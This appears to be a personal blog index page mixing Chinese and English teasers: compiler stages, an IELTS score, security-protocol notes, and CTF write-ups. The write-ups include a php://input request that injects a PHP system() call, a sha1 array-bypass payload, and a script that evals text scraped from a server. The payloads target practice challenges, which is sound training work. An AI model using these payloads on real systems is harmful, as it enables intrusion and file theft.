0%

image-20220427115625645

  • Preprocessor: replace macro start with #
  • Compiler: generates a .s file contains assembly-language program. Different compilers generate output file with assembly language.
  • Assembler: translate into machine codes stored in relocatable object program

“Do or do not, there is no try.”

Overall band score: 7.5 (Listening: 7.5 Reading: 9.0 Writing: 6.5 Speaking:6.5)

“End of story.”

Read more »

安全协议概述

定义:建立在密码算法基础上的一种高互通协议,运行在计算机通信网或分布式系统中,为安全需求的各方提供一系列步骤,借助于密码算法达到密钥分发、身份认证、安全实现网络通信或电子交易的目的

  • 密码算法是安全协议的基础和核心,安全协议是密码算法应用场景

  • 密码协议是安全协议的子集

  • 安全协议就是在消息处理环节使用了若干密码算法的协议,在密码算法的基础上为各种安全性需求提供实现方案

协议的概念包含了以下几层含义:

  • 规定了一系列有序执行的步骤,必须依次执行
  • 协议中有两个或以上的参与者,一个参与者不能构成协议
  • 协议有明确的目的,需要完成的目标,防范的风险
Read more »

ntpdate

特征

  • 出现在计划任务中
  • 加锁无法直接删除
  • 无法使用chattr去锁
Read more »

php伪协议

1
2
3
4
5
6
7
8
9
10
11
GET /?page=PHP://input HTTP/1.1
Host: 111.200.241.244:59405
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 41

<?php system("cat fl4gisisish3r3.php");?>
Read more »

Web2

Bugku-各种绕过哟

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
if ($_GET['uname'] == $_POST['passwd'])

print 'passwd can not be uname.';

else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

die('Flag: '.$flag);

else

print 'sorry!';

}
?>

sha1()函数同md5(),可以用数组绕过

1
2
http://114.67.246.176:13558/?id=margin&uname[]=1
postdata:passwd[]=2
Read more »

Bugku-秋名山车神

快速反弹 POST 请求,因为精度问题需要多次尝试

1
2
3
4
5
6
7
8
9
import requests
import re
url = 'http://114.67.246.176:17516/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)
Read more »